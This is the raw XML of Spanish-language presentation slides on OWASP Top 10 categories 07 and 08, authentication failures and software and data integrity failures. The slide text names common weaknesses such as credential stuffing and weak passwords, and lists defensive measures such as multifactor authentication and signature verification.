                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA19BB8F-9388-074F-C4D8-773113EBAC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6815" y="4785060"/>
            <a:ext cx="595313" cy="595313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Imagen 23" descr="Máquina de escribir sobre una superficie de color negro&#10;&#10;Descripción generada automáticamente con confianza baja">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{955F7795-1753-452A-FF0C-F3EFDA75794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40038" y="1541392"/>
            <a:ext cx="3157607" cy="3723653"/>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DCD04AB1-69F1-1E63-79BF-2657F986B4EC}"/>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938570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17FBF-700D-C931-0365-CE6F12B6780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9C5F5DF-48A4-55CA-2917-4A8B5D4EF8C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B19497D-584C-5E67-31AD-B7F63C31E1DE}"/>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07. Fallos de identificación y autorización</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2045C9F-A009-51B4-8C16-5F08D6E2B77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17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1D7A9C1-767C-7E8A-E2BF-9AA2DFCD1D4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="501758" y="477168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5" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74C151EB-D93B-33C1-D7BB-F3D6F5647FBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="501758" y="3122075"/>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7" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D7405F2-9026-A24B-6CBE-8F14A4DDC3AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496485" y="147541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8" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95B308E5-8721-1BA1-A327-AA34F8FA006D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2014741" y="1581806"/>
            <a:ext cx="6997856"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Permite a los atacantes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>comprometer las contraseñas, las claves o los tokens de sesión</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> para asumir las </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>identidades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de otros usuarios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ED61BD2-2DDA-D9A0-33AD-9C34239B01A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2014741" y="3041269"/>
            <a:ext cx="6376144" cy="1200329"/>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Ataques de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fuerza bruta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, ataques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>automatizados</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>credential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stuffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>), contraseñas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>por defecto/débiles/en texto plano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exposición ID de sesión</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> en la URL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>falta de rotación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> identificadores de sesión…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD4E956C-149D-5E49-BC4C-496C9263F5A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2014741" y="4832049"/>
            <a:ext cx="7277860"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Prevención mediante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>autenticación </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>multifactor</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comprobación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de contraseñas débiles, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>políticas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de longitud, complejidad y rotación de contraseñas, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>registro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de intentos fallidos de sesión…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Imagen 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BAC448E-9882-FAAA-D87E-BD62BFE0FA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184" y="1679519"/>
            <a:ext cx="611503" cy="611503"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Imagen 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E51ECE4E-F03B-2B2C-110A-4C9F76E5D6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183" y="5018384"/>
            <a:ext cx="611504" cy="611504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Imagen 12" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54BDF82A-9234-6A3B-C516-629F63165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183" y="3406483"/>
            <a:ext cx="609600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Imagen 13" descr="Un grupo de folletos sobre una superficie blanca&#10;&#10;Descripción generada automáticamente con confianza baja">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46006AD8-C01E-0E4C-6D01-1D81E5DE5FF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632057" y="2386219"/>
            <a:ext cx="3548913" cy="1597306"/>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85A241BA-8DAB-973D-4443-D61B91280D8F}"/>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8923569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35AC3-D944-0EF7-5F61-337FF7C25C0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62C39FD-16A7-7013-DCE8-A7B6F12AB2A4}"/>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09EA2BC-A496-5D33-2832-524E06D05123}"/>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07. Fallos de identificación y autorización</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E770A68-B185-F109-D812-278E70B60E8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25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C326DC45-85C7-D821-2525-1637A5BAC3EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5182803" y="315610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3" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8637442-C7BA-87CA-B1BA-19AC75BD2919}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6449876" y="1714183"/>
            <a:ext cx="5089380"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Utilizar servicios de autenticación proporcionados por </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> autorizados</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C732258A-E0C7-AB94-6AD8-73EFBFF47C9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6449876" y="3385392"/>
            <a:ext cx="5089380"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Requerir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>autenticación para todos los recursos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>y páginas excepto aquellas clasificadas como públicas. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83A5C85A-226A-425B-8409-260F66F0A593}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5182803" y="1592079"/>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7" name="Oval 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A8CC3BA-79FA-6B17-2192-D7149F48A13D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5182803" y="4758233"/>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b="1">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75B1DD93-9EDC-DAB0-60D9-EA35F9D159F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6449876" y="4987518"/>
            <a:ext cx="5089380"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Los mensajes de error </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>no deben mostrar detalles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sobre las credenciales. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Imagen 20" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{812268E8-A705-D487-C8D4-E207E93AE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390" y="3422123"/>
            <a:ext cx="609600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Imagen 21" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C4530D1-F1A1-3B4C-A63C-045E224EF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4390" y="5005883"/>
            <a:ext cx="609600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Imagen 22" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D38A4700-FDB0-7366-7228-983740386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57" y="1778769"/>
            <a:ext cx="731520" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Imagen 23" descr="Imagen de la pantalla de un computador portátil&#10;&#10;Descripción generada automáticamente con confianza media">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{757C1E16-F6D9-C06E-D72A-0C3969ADC8D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6222" t="5598" r="24143" b="5216"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="809001" y="1450744"/>
            <a:ext cx="3623841" cy="4412389"/>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358744C1-7840-05B0-E73E-FCA7E36221BA}"/>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691738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C70A9-EA75-1B47-F161-FC5A96C9BBA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6C16424-911F-5501-BFE1-B08B6E590E7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8CD68E3-648D-698C-4609-F6E10DC1C65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08. Fallos en la integridad del software y datos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46973F25-D4DF-C344-7FE3-2CCC3799ED1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5" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFB78656-0456-AC83-3A7B-3A1A915D066C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491162" y="1591153"/>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6" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E25852D-CB61-83F5-ED7C-AC66B4378EAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491162" y="3089585"/>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7" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D82B5A5-0C02-D0F4-0FEF-515F149192E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491162" y="475498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8" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50E67190-BE29-470E-416D-CF99F19FE91B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1985967" y="4682529"/>
            <a:ext cx="6189312"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Prevención mediante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>verificación de integridad de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>la firma, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>repositorios de confianza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> para librerías y dependencias, configuración y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> control de acceso adecuados</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C16375BB-5DEF-E2BE-3924-1D58CE6A3338}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1985967" y="1615317"/>
            <a:ext cx="6189312"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Relacionados con el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>código</a:t>
            </a:r>
            <a:r>
